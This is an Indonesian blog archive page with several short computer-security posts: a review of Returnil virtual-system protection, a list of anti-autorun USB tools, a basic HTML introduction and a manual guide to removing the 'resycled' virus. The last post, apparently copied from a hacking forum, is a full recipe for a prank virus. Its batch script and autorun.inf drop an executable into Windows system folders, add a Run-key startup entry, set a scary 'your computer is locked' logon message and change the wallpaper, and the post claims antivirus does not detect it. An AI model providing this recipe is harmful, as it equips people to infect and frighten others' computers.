Arsip untuk Mei, 2009

returnil2

Salah satu pilihan untuk mengimunkan komputer dari infeksi malware adalah dengan cara virtualisasi. Dengan virtualisasi ini, apabila komputer terserang malware, yang terkena bukanlah sistem komputer tersebut secara langsung, tetapi sistem virtual tersebut yang terkena.

Software yang memproteksi komputer dengan virtualisasi ada beberapa, namun yang cukup populer
adalah Deepfreeze. Software ini banyak dipakai oleh warnet-warnet. Namun, program ini tidaklah gratis. Kita harus merogoh kocek cukup dalam untuk memakainya.

Software yang memiliki fungsi seperti halnya Deepfreeze adalah Returnil Virtual System (RVS). Tidak seperti Deepfreeze, RVS tersedia juga dalam versi gratis yaitu RVS Personal. RVS Personal bisa didownload di websitenya. RVS Personal ini gratis untuk pemakaian pribadi yang berarti tidak diperbolehkan digunakan untuk keperluan komersial, misalnya warnet.

Seperti halnya deepfreeze, RVS ini menerapkan teknologi virtualisasi untuk melindungi sistem
operasi Microsft Windows dari perubahan yang tidak diinginkan, baik oleh malware maupun kesalahan penggunaan. Bedanya adalah RVS ini hanya bekerja pada drive di mana Microsoft Windows diinstall. Misalnya MS Windows diintall di drive C, ketika RVS ini diaktifkan, maka segala perubahan di drive C akan hilang setelah komputer booting pada waktu berikutnya.

Hal ini berlaku pada keseluruhan partisi sistem (misalnya drive C). Jadi segala penambahan dan
pengurangan, termasuk instalasi atau perubahan (menyimpan atau menghapus data) di folder My Document (jika folder ini berada di drive C ) akan hilang dan kembali seperti semula seperti sebelum RVS ini diaktifkan. Sedangkan perubahan di partisi lain (misalnya drive D) tetap permanen. Karena itu ketika mengaktifkan RVS, pastikan bahwa data tersimpan di drive selain di drive tempat sistem berada.

Apabila komputer hanya memiliki satu partisi, RVS memiliki fasilitas untuk membuat drive virtual,
sehingga data bisa disimpan di drive tersebut. Jadi drive virtual ini berfungsi
seperti partisi non sistem sehingga kita bisa menyimpan secara permanen data di

Iklan

Worm yang cukup menggemparkan di tahun ini adalah conficker atau kido atau Downadup. Selain menyebar melalui jaringan dengan memanfaatkan kelemahan Windows, worm ini menyebar melalui flahsdisk. Untuk menghambat penyebaran worm ini sebaiknya gunakan software-software yang berfungsi untuk ini.

1. Ninja Pendisk dari http;//nunobrito.eu/ninja/ , cara kerjanya dia menghapus autorun.inf, file-file virus yang namanya ada di file setting, membuat folder autorun.inf untuk mencegah terbentuknya file autorun.inf di flashdisk
2. USB Firewall di http://net-studio.org/application/usb_firewall.php, memberitahu jika ada program yang jalan via autorun
3. Dubalang, di http://www.ahlul.web.id/download/setupDubalang.exe (Untuk mendownloadnya, klik kanan-save as)

4. Panda USB and Autorun Vaccine, di http://research.pandasecurity.com/archive/Panda-USB-and-AutoRun-Vaccine.aspx
5.Ikill di http://arpantech.aphelic.com/downloads/software/security/iKill.htm
6. Autorun USB Finder di http://www.softpedia.com/progDownload/Autorun-USB-Virus-Finder-Download-118726.html
7. Autorun eater di http://www.softpedia.com/get/Security/Secure-cleaning/Autorun-Eater.shtml
8. FD Guard
9. Autorun Virus remover di http://download.cnet.com/Autorun-Virus-Remover/3000-2239_4-10855225.html (thanks for (widnyana putra)
10. Stop Autorun di http://download.cnet.com/StopAutorun/3000-2162_4-10846092.html

Yang ini pencegahan melalui USB Write Protection

1. USB Write Protector di http://www.gaijin.at/download/usbwp.rar (info dari darkarchon)
2. Thumbscrew (sama usb write protect) di http://www.irongeek.com/i.php?page=security/thumbscrew-software-usb-write-blocker
3. Mengenai Write Protect, baca http://ebsoft.web.id/2008/06/26/mengembalikan-usb-flash-yang-di-disable-write-protected/
Yang ini proteksi dari flashdisknya

1. Super Autorun di http://ebsoft.web.id/2009/02/27/mencegah-virus-membuat-autoruninf-dengan-super-autorun/
2. MakeSuperDir di http://pandu.poluan.info/progs/makesuperdir/makesuperdir.vbs.zip dan baca juga artikelnya di http://pandu.poluan.info/blog/itguy-id.php/2008/06/12/winpowertip-cara-melindungi-flash-disk-t
3. Baca juga artikel di http://ebsoft.web.id/2008/06/26/mengembalikan-usb-flash-yang-di-disable-write-protected/
4. Baca juga http://ebsoft.web.id/2009/02/19/proteksi-usb-flashdisk-dari-virus-dengan-file-dummy/

Pengenalan HTML
A. World Wide Web
Internet merupkan jaringan global yang menghubungkan suatu network dengan network lainya di seluruh dunia, TCP/IP menjadi protocol penghubung antara jaringan-jaringan yang beragam di seluruh dunia untuk dapat berkomunikasi. World Wide Web (WWW) merupakan bagian dari internet yang paling cepat berkembang dan paling populer. WWW bekerja merdasarkan pada tiga mekanisme berikut:
• Protocol standard aturan yang di gunakan untuk berkomunikasi pada computer networking, Hypertext Transfer Protocol (HTTP) adalah protocol untuk WWW.
• Address WWW memiliki aturan penamaan alamat web yaitu URL(Uniform Resource Locator) yang di gunakan sebagai standard alamat internet.
• HTML digunakan untuk membuat document yang bisa di akses melalui web.

B. Pengenalan HTML
Hypertext Markup Language merupkan standard bahasa yang di gunakan untuk menampilkan document web, yang bisa anda lakukan dengan HTML yaitu:
• Mengontrol tampilan dari web page dan contentnya.
• Mempublikasikan document secara online sehingga bisa di akses dari seluruh dunia.
• Membuat online form yang bisa di gunakan untuk menangani pendaftaran, transaksi secara online.
• Menambahkan object-object seperti image, audi, video dan juga java applet dalam document HTML.

C. Browser dan Editor
Browser
Browser merupakan software yang di install di mesin client yang berfungsi untuk menterjemahkan tag-tag HTML menjadi halaman web. Browser yang sering di gunakan biasanya Internet Explorer, Netscape Navigator dan masih banyak yang lainya.

Editor
Program yang di gunakan untuk membuat document HTML, ada banyak HTML editor yang bisa anda gunakan diantaranya: Ms FrontPage, Dreamweaver, Notepad.

Pernah kena virus resycled?
Tiba-2 kompi jadi lemot?

Ini cara ngilangin manual, tanpa antivius.
Loh, kok ga pake antivirus?
Na, silakan baca penjelasan saia berikut.

Bagaimana virus menginfeksi
—————————
Paling umum adalah dari removable media seperti flash disk.
Saat kita dobel-klik flash disk yang terinfeksi, kita
secara tidak sadar menjalankan autorun.inf milik sang virus.
Ini adalah contoh “social engineering” para pembuat virus,
yaitu memanfaatkan kebiasaan dan ketidaktelitian pengguna.

Repotnya, dengan men dobel-klik tersebut, pengguna mamberi
wewenang pada windows untuk melakukan batch operation, yang
perintah-2 nya seakan-akan “tidak membahayakan” sistem, sehingga
sangat sering virus autorun / dobel-klik, mem-bypass antivirus.
Karena dianggap bukan virus, saat kita lakukan scan virus,
maka hasilnya akan negatif. Ataupun jika ketemu belum tentu bisa
menghapus, karena itu, diperlukan cara manual untuk menghilangkannya.

Apa yang dia lakukan
——————–
– Saat running dia akan membuat file autorun.inf di drive yang aktif
– Virus tersebut akan menyalin file “boot.com” ke folder-2 system
– Melakukan penambahan entry pada registry

Cara manghilangkan virus resycled
———————————
01 Restart komputer
02 Masuk safe mode (tekan F8 saat booting, pilih safe mode)
03 Buka explorer

Penting: selama proses JANGAN membuka drive/folder dengan dobel-klik

04 Masuk menu tools –> folder options –> view
05 Pilih “Show hidden files and folders”
06 Hilangkan centang pada pilihan berikut:
–> * Hide extensions for known file types
–> * Hide protected operrating system files
07 Dengan menggunakan explorer tree, temukan dan hapus file “autorun.inf”
08 Lakukan langkah 07 pada semua drive, bisa manggunakan search, tapi
hati-2 ada file autorun yang memang diperlukan.
09 Periksa folder-2:
–> c:\windows\system32\dllcache
–> c:\windows\prefetch
cari file “boot.com”, jika ketemu, hapus
10 Buka folder-2:
–> c:\windows\temp
–> c:\Documents and Settings\[USER PROFILE]\Local Settings\Temp
hapus semua isinya, ada beberapa file yang menolak dihapus, biarkan saja
11 Jalankan REGEDIT
12 Pilih File –> search
13 cari entry “boot.com”, jika ketemu hapus. Tekan F3 untuk mengulang pencarian
sampai akhir registry
14 Kembali pada entry pertama, lakukan seperti langkah 13 untuk entry “resycled”
15 Tutup semua aplikasi, restart kompi
16 Buka explorer, cari dan hapus semua folder “resycled”
17 Untuk jaga-2 lakukan kembali langkah 07 dan 08

— Selamat, kompi anda sudah bebas dari virus resycled —

TIPS:
– Jangan buka flash disk / drive dengan dobel-klik, pake explorer tree saja
– Gunakan opsi show hidden files pada folder options
– Gunakan opsi show extention pada folder options
– Waspada jika ada nama file / folder berganda
– Waspada jika file kerja anda berekstensi .com atau .exe
– Jangan klik file yang tiba-2 muncul / tidak pernah anda bikin, apalagi kalo namanya aneh-2
– Gunakan antivirus, lakukan update rutin
– Selalu hati-2 dan teliti, terutama waktu lagi buru-2

Semoga dapat berguna bagi mereka yang kena virus ini dan udah nyerah sampe mau
install ulang.

Silakan menyalin dan menyebarluaskan tulisan ini, tapi jangan lupa menyertakan nama penulis asli.

by: ridwan36, specially made for IDWS

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
– buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

– lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
– buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

– lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
– file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
– copy file-file tsb ke CD
– nikmati efeknya

note:
– jangan disalahgunakan
– maaf kalau pernah diposting
– maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
– lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
– kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281